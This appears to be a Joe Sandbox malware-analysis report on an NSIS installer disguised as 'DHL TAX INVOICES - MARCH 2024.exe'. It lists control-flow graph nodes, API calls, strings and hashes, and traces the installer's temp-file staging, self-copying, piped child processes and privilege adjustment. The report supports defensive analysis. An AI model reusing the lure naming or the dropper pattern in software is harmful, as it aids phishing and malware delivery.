CharNextW 3416->3424 3459 4036ef 3416->3459 3472 4036ff 3416->3472 3417->3411 3418 403602 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3417->3418 3422 403385 12 API calls 3418->3422 3419->3407 3584 40617e lstrcpynW 3421->3584 3423 403630 3422->3423 3423->3411 3423->3472 3441 40366b 3424->3441 3428 403839 3430 403841 GetCurrentProcess OpenProcessToken 3428->3430 3431 4038bd ExitProcess 
3428->3431 3429 403719 3610 4058c3 3429->3610 3433 403859 LookupPrivilegeValueW AdjustTokenPrivileges 3430->3433 3434 40388d 3430->3434 3433->3434 3440 406558 5 API calls 3434->3440 3436 4036c9 3585 405c3a 3436->3585 3437 40372f 3614 405846 3437->3614 3448 403894 3440->3448 3441->3436 3441->3437 3445 403750 lstrcatW lstrcmpiW 3450 40376c 3445->3450 3445->3472 3446 403745 lstrcatW 3446->3445 3447 4038a9 ExitWindowsEx 3447->3431 3451 4038b6 3447->3451 3448->3447 3448->3451 3453 403771 3450->3453 3454 403778 3450->3454 3634 40140b 3451->3634 3452 4036e4 3600 40617e lstrcpynW 3452->3600 3617 4057ac CreateDirectoryW 3453->3617 3622 405829 CreateDirectoryW 3454->3622 3528 4039c7 3459->3528 3461 40377d SetCurrentDirectoryW 3462 403798 3461->3462 3463 40378d 3461->3463 3626 40617e lstrcpynW 3462->3626 3625 40617e lstrcpynW 3463->3625 3466 4061a0 18 API calls 3467 4037d7 DeleteFileW 3466->3467 3468 4037e4 CopyFileW 3467->3468 3474 4037a6 3467->3474 3468->3474 3469 40382d 3471 40601f 38 API calls 3469->3471 3471->3472 3601 4038d5 3472->3601 3473 4061a0 18 API calls 3473->3474 3474->3466 3474->3469 3474->3473 3476 403818 CloseHandle 3474->3476 3627 40601f MoveFileExW 3474->3627 3631 40585e CreateProcessW 3474->3631 3476->3474 3478 40650a wsprintfW LoadLibraryExW 3477->3478 3478->3394 3481 406574 3480->3481 3482 40657e GetProcAddress 3480->3482 3483 4064e8 3 API calls 3481->3483 3484 40341f 3482->3484 3485 40657a 3483->3485 3484->3398 3485->3482 3485->3484 3486->3401 3487->3403 3489 406412 5 API calls 3488->3489 3490 403391 3489->3490 3491 40339b 3490->3491 3637 405b32 lstrlenW CharPrevW 3490->3637 3491->3409 3494 405829 2 API calls 3495 4033a9 3494->3495 3496 405d82 2 API calls 3495->3496 3497 4033b4 3496->3497 3497->3409 3640 405d53 GetFileAttributesW CreateFileW 3498->3640 3500 402e84 3527 402e91 3500->3527 3641 40617e lstrcpynW 3500->3641 3502 402ea7 3642 405b7e lstrlenW 3502->3642 3506 402eb8 GetFileSize 3507 402fb9 3506->3507 3526 402ecf 3506->3526 3647 402d9f 3507->3647 
3511 402ffc GlobalAlloc 3514 403013 3511->3514 3512 403054 3515 402d9f 33 API calls 3512->3515 3519 405d82 2 API calls 3514->3519 3515->3527 3516 402fdd 3517 403358 ReadFile 3516->3517 3520 402fe8 3517->3520 3518 402d9f 33 API calls 3518->3526 3521 403024 CreateFileW 3519->3521 3520->3511 3520->3527 3522 40305e 3521->3522 3521->3527 3662 40336e SetFilePointer 3522->3662 3524 40306c 3663 4030e7 3524->3663 3526->3507 3526->3512 3526->3518 3526->3527 3678 403358 3526->3678 3527->3416 3529 406558 5 API calls 3528->3529 3530 4039db 3529->3530 3531 4039e1 GetUserDefaultUILanguage 3530->3531 3532 4039f3 3530->3532 3714 4060c5 wsprintfW 3531->3714 3534 40604b 3 API calls 3532->3534 3536 403a23 3534->3536 3535 4039f1 3715 403c9d 3535->3715 3537 403a42 lstrcatW 3536->3537 3538 40604b 3 API calls 3536->3538 3537->3535 3538->3537 3541 405c3a 18 API calls 3542 403a74 3541->3542 3543 403b08 3542->3543 3545 40604b 3 API calls 3542->3545 3544 405c3a 18 API calls 3543->3544 3546 403b0e 3544->3546 3547 403aa6 3545->3547 3548 403b1e LoadImageW 3546->3548 3549 4061a0 18 API calls 3546->3549 3547->3543 3552 403ac7 lstrlenW 3547->3552 3555 405b5f CharNextW 3547->3555 3550 403bc4 3548->3550 3551 403b45 RegisterClassW 3548->3551 3549->3548 3554 40140b 2 API calls 3550->3554 3553 403b7b SystemParametersInfoW CreateWindowExW 3551->3553 3583 403bce 3551->3583 3556 403ad5 lstrcmpiW 3552->3556 3557 403afb 3552->3557 3553->3550 3558 403bca 3554->3558 3560 403ac4 3555->3560 3556->3557 3561 403ae5 GetFileAttributesW 3556->3561 3559 405b32 3 API calls 3557->3559 3562 403c9d 19 API calls 3558->3562 3558->3583 3563 403b01 3559->3563 3560->3552 3564 403af1 3561->3564 3565 403bdb 3562->3565 3731 40617e lstrcpynW 3563->3731 3564->3557 3567 405b7e 2 API calls 3564->3567 3568 403be7 ShowWindow 3565->3568 3569 403c6a 3565->3569 3567->3557 3570 4064e8 3 API calls 3568->3570 3724 4053b0 OleInitialize 3569->3724 3573 403bff 3570->3573 3572 403c70 3574 403c74 3572->3574 3575 403c8c 3572->3575 3576 403c0d 
GetClassInfoW 3573->3576 3578 4064e8 3 API calls 3573->3578 3581 40140b 2 API calls 3574->3581 3574->3583 3577 40140b 2 API calls 3575->3577 3579 403c21 GetClassInfoW RegisterClassW 3576->3579 3580 403c37 DialogBoxParamW 3576->3580 3577->3583 3578->3576 3579->3580 3582 40140b 2 API calls 3580->3582 3581->3583 3582->3583 3583->3472 3584->3419 3740 40617e lstrcpynW 3585->3740 3587 405c4b 3741 405bdd CharNextW CharNextW 3587->3741 3590 4036d5 3590->3472 3599 40617e lstrcpynW 3590->3599 3591 406412 5 API calls 3597 405c61 3591->3597 3592 405c92 lstrlenW 3593 405c9d 3592->3593 3592->3597 3595 405b32 3 API calls 3593->3595 3596 405ca2 GetFileAttributesW 3595->3596 3596->3590 3597->3590 3597->3592 3598 405b7e 2 API calls 3597->3598 3747 4064c1 FindFirstFileW 3597->3747 3598->3592 3599->3452 3600->3459 3602 4038f0 3601->3602 3603 4038e6 CloseHandle 3601->3603 3604 403904 3602->3604 3605 4038fa CloseHandle 3602->3605 3603->3602 3750 403932 3604->3750 3605->3604 3612 4058d8 3610->3612 3611 403727 ExitProcess 3612->3611 3613 4058ec MessageBoxIndirectW 3612->3613 3613->3611 3615 406558 5 API calls 3614->3615 3616 403734 lstrcatW 3615->3616 3616->3445 3616->3446 3618 403776 3617->3618 3619 4057fd GetLastError 3617->3619 3618->3461 3619->3618 3620 40580c SetFileSecurityW 3619->3620 3620->3618 3621 405822 GetLastError 3620->3621 3621->3618 3623 405839 3622->3623 3624 40583d GetLastError 3622->3624 3623->3461 3624->3623 3625->3462 3626->3474 3628 406040 3627->3628 3629 406033 3627->3629 3628->3474 3806 405ead lstrcpyW 3629->3806 3632 405891 CloseHandle 3631->3632 3633 40589d 3631->3633 3632->3633 3633->3474 3635 401389 2 API calls 3634->3635 3636 401420 3635->3636 3636->3431 3638 4033a3 3637->3638 3639 405b4e lstrcatW 3637->3639 3638->3494 3639->3638 3640->3500 3641->3502 3643 405b8c 3642->3643 3644 405b92 CharPrevW 3643->3644 3645 402ead 3643->3645 3644->3643 3644->3645 3646 40617e lstrcpynW 3645->3646 3646->3506 3648 402db0 3647->3648 3649 402dc8 3647->3649 3652 402dc0 
3648->3652 3653 402db9 DestroyWindow 3648->3653 3650 402dd0 3649->3650 3651 402dd8 GetTickCount 3649->3651 3682 406594 3650->3682 3651->3652 3655 402de6 3651->3655 3652->3511 3652->3527 3681 40336e SetFilePointer 3652->3681 3653->3652 3656 402e1b CreateDialogParamW ShowWindow 3655->3656 3657 402dee 3655->3657 3656->3652 3657->3652 3686 402d83 3657->3686 3659 402dfc wsprintfW 3660 4052dd 25 API calls 3659->3660 3661 402e19 3660->3661 3661->3652 3662->3524 3664 403112 3663->3664 3665 4030f6 SetFilePointer 3663->3665 3689 4031ef GetTickCount 3664->3689 3665->3664 3668 4031af 3668->3527 3671 4031ef 43 API calls 3672 403149 3671->3672 3672->3668 3673 4031b5 ReadFile 3672->3673 3675 403158 3672->3675 3673->3668 3675->3668 3676 405dd6 ReadFile 3675->3676 3704 405e05 WriteFile 3675->3704 3676->3675 3679 405dd6 ReadFile 3678->3679 3680 40336b 3679->3680 3680->3526 3681->3516 3683 4065b1 PeekMessageW 3682->3683 3684 4065c1 3683->3684 3685 4065a7 DispatchMessageW 3683->3685 3684->3652 3685->3683 3687 402d92 3686->3687 3688 402d94 MulDiv 3686->3688 3687->3688 3688->3659 3690 403347 3689->3690 3691 40321d 3689->3691 3692 402d9f 33 API calls 3690->3692 3706 40336e SetFilePointer 3691->3706 3698 403119 3692->3698 3694 403228 SetFilePointer 3700 40324d 3694->3700 3695 403358 ReadFile 3695->3700 3697 402d9f 33 API calls 3697->3700 3698->3668 3702 405dd6 ReadFile 3698->3702 3699 405e05 WriteFile 3699->3700 3700->3695 3700->3697 3700->3698 3700->3699 3701 403328 SetFilePointer 3700->3701 3707 406697 3700->3707 3701->3690 3703 403132 3702->3703 3703->3668 3703->3671 3705 405e23 3704->3705 3705->3675 3706->3694 3708 4066bc 3707->3708 3711 4066c4 3707->3711 3708->3700 3709 406754 GlobalAlloc 3709->3708 3709->3711 3710 40674b GlobalFree 3710->3709 3711->3708 3711->3709 3711->3710 3712 4067c2 GlobalFree 3711->3712 3713 4067cb GlobalAlloc 3711->3713 3712->3713 3713->3708 3713->3711 3714->3535 3716 403cb1 3715->3716 3732 4060c5 wsprintfW 3716->3732 3718 403d22 3719 4061a0 18 API calls 
3718->3719 3720 403d2e SetWindowTextW 3719->3720 3721 403a52 3720->3721 3722 403d4a 3720->3722 3721->3541 3722->3721 3723 4061a0 18 API calls 3722->3723 3723->3722 3733 40428e 3724->3733 3726 4053d3 3730 4053fa 3726->3730 3736 401389 3726->3736 3727 40428e SendMessageW 3728 40540c OleUninitialize 3727->3728 3728->3572 3730->3727 3731->3543 3732->3718 3734 4042a6 3733->3734 3735 404297 SendMessageW 3733->3735 3734->3726 3735->3734 3738 401390 3736->3738 3737 4013fe 3737->3726 3738->3737 3739 4013cb MulDiv SendMessageW 3738->3739 3739->3738 3740->3587 3743 405c0c 3741->3743 3744 405bfa 3741->3744 3742 405c30 3742->3590 3742->3591 3743->3742 3746 405b5f CharNextW 3743->3746 3744->3743 3745 405c07 CharNextW 3744->3745 3745->3742 3746->3743 3748 4064e2 3747->3748 3749 4064d7 FindClose 3747->3749 3748->3597 3749->3748 3751 403940 3750->3751 3752 403945 FreeLibrary GlobalFree 3751->3752 3753 403909 3751->3753 3752->3752 3752->3753 3754 40596f 3753->3754 3755 405c3a 18 API calls 3754->3755 3756 40598f 3755->3756 3757 405997 DeleteFileW 3756->3757 3758 4059ae 3756->3758 3759 403708 OleUninitialize 3757->3759 3760 405ad9 3758->3760 3793 40617e lstrcpynW 3758->3793 3759->3428 3759->3429 3760->3759 3767 4064c1 2 API calls 3760->3767 3762 4059d4 3763 4059e7 3762->3763 3764 4059da lstrcatW 3762->3764 3766 405b7e 2 API calls 3763->3766 3765 4059ed 3764->3765 3768 4059fd lstrcatW 3765->3768 3771 405a08 lstrlenW FindFirstFileW 3765->3771 3766->3765 3769 405af3 3767->3769 3768->3771 3769->3759 3770 405af7 3769->3770 3772 405b32 3 API calls 3770->3772 3773 405ace 3771->3773 3779 405a2a 3771->3779 3774 405afd 3772->3774 3773->3760 3776 405927 5 API calls 3774->3776 3775 405ab1 FindNextFileW 3775->3779 3780 405ac7 FindClose 3775->3780 3778 405b09 3776->3778 3781 405b23 3778->3781 3782 405b0d 3778->3782 3779->3775 3786 40596f 62 API calls 3779->3786 3788 4052dd 25 API calls 3779->3788 3791 4052dd 25 API calls 3779->3791 3792 40601f 38 API calls 3779->3792 3794 40617e lstrcpynW 
3779->3794 3795 405927 3779->3795 3780->3773 3784 4052dd 25 API calls 3781->3784 3782->3759 3785 4052dd 25 API calls 3782->3785 3784->3759 3787 405b1a 3785->3787 3786->3779 3789 40601f 38 API calls 3787->3789 3788->3775 3790 405b21 3789->3790 3790->3759 3791->3779 3792->3779 3793->3762 3794->3779 3803 405d2e GetFileAttributesW 3795->3803 3797 405954 3797->3779 3799 405942 RemoveDirectoryW 3801 405950 3799->3801 3800 40594a DeleteFileW 3800->3801 3801->3797 3802 405960 SetFileAttributesW 3801->3802 3802->3797 3804 405d40 SetFileAttributesW 3803->3804 3805 405933 3803->3805 3804->3805 3805->3797 3805->3799 3805->3800 3807 405ed5 3806->3807 3808 405efb GetShortPathNameW 3806->3808 3833 405d53 GetFileAttributesW CreateFileW 3807->3833 3810 405f10 3808->3810 3811 40601a 3808->3811 3810->3811 3813 405f18 wsprintfA 3810->3813 3811->3628 3812 405edf CloseHandle GetShortPathNameW 3812->3811 3814 405ef3 3812->3814 3815 4061a0 18 API calls 3813->3815 3814->3808 3814->3811 3816 405f40 3815->3816 3834 405d53 GetFileAttributesW CreateFileW 3816->3834 3818 405f4d 3818->3811 3819 405f5c GetFileSize GlobalAlloc 3818->3819 3820 406013 CloseHandle 3819->3820 3821 405f7e 3819->3821 3820->3811 3822 405dd6 ReadFile 3821->3822 3823 405f86 3822->3823 3823->3820 3835 405cb8 lstrlenA 3823->3835 3826 405fb1 3828 405cb8 4 API calls 3826->3828 3827 405f9d lstrcpyA 3829 405fbf 3827->3829 3828->3829 3830 405ff6 SetFilePointer 3829->3830 3831 405e05 WriteFile 3830->3831 3832 40600c GlobalFree 3831->3832 3832->3820 3833->3812 3834->3818 3836 405cf9 lstrlenA 3835->3836 3837 405d01 3836->3837 3838 405cd2 lstrcmpiA 3836->3838 3837->3826 3837->3827 3838->3837 3839 405cf0 CharNextA 3838->3839 3839->3836 4923 401b37 4924 401b44 4923->4924 4925 401b88 4923->4925 4926 401bcd 4924->4926 4931 401b5b 4924->4931 4927 401bb2 GlobalAlloc 4925->4927 4928 401b8d 4925->4928 4930 4061a0 18 API calls 4926->4930 4938 402288 4926->4938 4929 4061a0 18 API calls 4927->4929 4928->4938 4944 40617e lstrcpynW 4928->4944 
4929->4926 4932 402282 4930->4932 4942 40617e lstrcpynW 4931->4942 4937 4058c3 MessageBoxIndirectW 4932->4937 4934 401b9f GlobalFree 4934->4938 4936 401b6a 4943 40617e lstrcpynW 4936->4943 4937->4938 4940 401b79 4945 40617e lstrcpynW 4940->4945 4942->4936 4943->4940 4944->4934 4945->4938 4946 402537 4947 402562 4946->4947 4948 40254b 4946->4948 4950 402596 4947->4950 4951 402567 4947->4951 4949 402ba2 18 API calls 4948->4949 4958 402552 4949->4958 4952 402bbf 18 API calls 4950->4952 4953 402bbf 18 API calls 4951->4953 4955 40259d lstrlenW 4952->4955 4954 40256e WideCharToMultiByte lstrlenA 4953->4954 4954->4958 4955->4958 4956 4025ca 4957 4025e0 4956->4957 4959 405e05 WriteFile 4956->4959 4958->4956 4958->4957 4960 405e34 5 API calls 4958->4960 4959->4957 4960->4956 4961 4014b8 4962 4014be 4961->4962 4963 401389 2 API calls 4962->4963 4964 4014c6 4963->4964 3899 4015b9 3900 402bbf 18 API calls 3899->3900 3901 4015c0 3900->3901 3902 405bdd 4 API calls 3901->3902 3914 4015c9 3902->3914 3903 401629 3905 40162e 3903->3905 3907 40165b 3903->3907 3904 405b5f CharNextW 3904->3914 3906 401423 25 API calls 3905->3906 3909 401635 3906->3909 3908 401423 25 API calls 3907->3908 3916 401653 3908->3916 3918 40617e lstrcpynW 3909->3918 3911 405829 2 API calls 3911->3914 3912 405846 5 API calls 3912->3914 3913 401642 SetCurrentDirectoryW 3913->3916 3914->3903 3914->3904 3914->3911 3914->3912 3915 40160f GetFileAttributesW 3914->3915 3917 4057ac 4 API calls 3914->3917 3915->3914 3917->3914 3918->3913 4972 40293b 4973 402ba2 18 API calls 4972->4973 4974 402941 4973->4974 4975 402964 4974->4975 4976 40297d 4974->4976 4984 40281e 4974->4984 4977 40297a 4975->4977 4980 402969 4975->4980 4978 402993 4976->4978 4979 402987 4976->4979 4987 4060c5 wsprintfW 4977->4987 4982 4061a0 18 API calls 4978->4982 4981 402ba2 18 API calls 4979->4981 4986 40617e lstrcpynW 4980->4986 4981->4984 4982->4984 4986->4984 4987->4984

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 10001096: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                              • Part of subcall function 10001096: GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                              • Part of subcall function 10001096: GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                            • GetModuleFileNameW.KERNEL32(?,00000104), ref: 10001159
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 10001171
                                                            • CharPrevW.USER32(?,?), ref: 1000119C
                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C3
                                                            • GetTempFileNameW.KERNEL32(?,100030A4,00000000,?), ref: 100011E3
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 100011F9
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 10001211
                                                            • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 10001221
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1000122F
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 10001259
                                                            • CloseHandle.KERNEL32(00000000), ref: 10001266
                                                            • CloseHandle.KERNEL32(?), ref: 1000126B
                                                            • lstrcatW.KERNEL32(00000000,100030A0), ref: 10001273
                                                            • lstrlenW.KERNEL32(00000000), ref: 1000127A
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000129D
                                                            • FindWindowExW.USER32(0001045C,00000000,#32770,00000000), ref: 100012D7
                                                            • FindWindowExW.USER32(00000000), ref: 100012DA
                                                            • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 10001310
                                                            • DeleteFileW.KERNEL32(?,error), ref: 1000134C
                                                            • GetVersion.KERNEL32 ref: 10001394
                                                            • GlobalAlloc.KERNEL32(00000042,00002000), ref: 100013E1
                                                            • GlobalLock.KERNEL32(00000000), ref: 100013F3
                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1000140B
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 10001418
                                                            • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 10001437
                                                            • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 1000144E
                                                            • GetStartupInfoW.KERNEL32(00000044), ref: 1000145F
                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 10001498
                                                            • GetTickCount.KERNEL32 ref: 100014A6
                                                            • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 100014CD
                                                            • GetTickCount.KERNEL32 ref: 100014DC
                                                            • ReadFile.KERNEL32(?,100030B8,000003FF,?,00000000), ref: 100014F8
                                                            • lstrlenW.KERNEL32(?), ref: 10001529
                                                            • lstrlenW.KERNEL32(?,100034B8,00000400), ref: 1000153F
                                                            • lstrcpynW.KERNEL32(00000000), ref: 10001545
                                                            • lstrlenW.KERNEL32(100034B8), ref: 10001554
                                                            • GlobalSize.KERNEL32(00000002), ref: 10001560
                                                            • GlobalUnlock.KERNEL32(00000002), ref: 10001570
                                                            • GlobalReAlloc.KERNEL32(00000002,00000903,00000042), ref: 10001583
                                                            • GlobalLock.KERNEL32(00000000), ref: 10001595
                                                            • lstrcatW.KERNEL32(?,100034B8), ref: 100015A2
                                                            • GlobalSize.KERNEL32(00000002), ref: 100015B5
                                                            • lstrlenW.KERNEL32(00000000), ref: 100015D5
                                                            • lstrcpyW.KERNEL32(00000000, ), ref: 100015F9
                                                            • CharNextW.USER32(?), ref: 10001660
                                                            • GetTickCount.KERNEL32 ref: 10001692
                                                            • TerminateProcess.KERNEL32(?,000000FF), ref: 100016A6
                                                            • lstrcpyW.KERNEL32(?,timeout), ref: 100016B8
                                                            • Sleep.KERNELBASE(00000064), ref: 100016C2
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 100016CC
                                                            • GetExitCodeProcess.KERNELBASE(?,?), ref: 100016DC
                                                            • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 100016ED
                                                            • lstrcpyW.KERNEL32(?,error), ref: 10001704
                                                            • lstrcpyW.KERNEL32(?,error), ref: 10001746
                                                            • wsprintfW.USER32 ref: 10001764
                                                            • CloseHandle.KERNEL32(?,?), ref: 10001782
                                                            • CloseHandle.KERNEL32(?), ref: 10001787
                                                            • CloseHandle.KERNEL32(?), ref: 1000178C
                                                            • CloseHandle.KERNEL32(?), ref: 10001791
                                                            • CloseHandle.KERNEL32(?), ref: 10001796
                                                            • CloseHandle.KERNEL32(?), ref: 1000179B
                                                            • DeleteFileW.KERNEL32(?), ref: 100017B4
                                                            • GlobalFree.KERNEL32(?), ref: 100017C3
                                                            • GlobalUnlock.KERNEL32(00000001), ref: 100017CD
                                                            • GlobalFree.KERNEL32(00000001), ref: 100017D6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1636824093.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000000.00000002.1636907483.0000000010002000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000000.00000002.1636928724.0000000010003000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000000.00000002.1636977025.0000000010004000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Global$File$Handle$Close$Createlstrlen$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
                                                            • String ID: $#32770$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
                                                            • API String ID: 4049317599-610251817
                                                            • Opcode ID: 4de4489b57b660db5782b176ed1e4333d4c0aa78f68f3c529f7b8b0113b7edee
                                                            • Instruction ID: 2677895ddf37c1053812e27609b1e6fbca017aada50ee4cc97fc4c080284ca28
                                                            • Opcode Fuzzy Hash: 4de4489b57b660db5782b176ed1e4333d4c0aa78f68f3c529f7b8b0113b7edee
                                                            • Instruction Fuzzy Hash: 26221871900219EFEB11DFA4CC88AEEBBBDFF48384F11406AE605A7169DB315E85CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            [Control-flow graph: function entry block 4033b6-4033e9]
                                                            APIs
                                                            • SetErrorMode.KERNELBASE ref: 004033D9
                                                            • GetVersion.KERNEL32 ref: 004033DF
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
                                                            • #17.COMCTL32(00000007,00000009), ref: 0040342B
                                                            • OleInitialize.OLE32(00000000), ref: 00403432
                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000000), ref: 00403476
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000020), ref: 0040349D
                                                              • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                              • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040363D
                                                              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                            • OleUninitialize.OLE32(?), ref: 00403708
                                                            • ExitProcess.KERNEL32 ref: 00403729
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040373C
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040374B
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403756
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000000,?), ref: 00403762
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 004037D8
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,00420EE8,00000001), ref: 004037EC
                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403887
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
                                                            • ExitProcess.KERNEL32 ref: 004038CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\releve$C:\Users\user\AppData\Local\releve$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 2488574733-213317474
                                                            • Opcode ID: adc4d748d9836f5a15988fa3e2f94b2f0245c9efab62edd68d6b1bb0daacd0ec
                                                            • Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
                                                            • Opcode Fuzzy Hash: adc4d748d9836f5a15988fa3e2f94b2f0245c9efab62edd68d6b1bb0daacd0ec
                                                            • Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
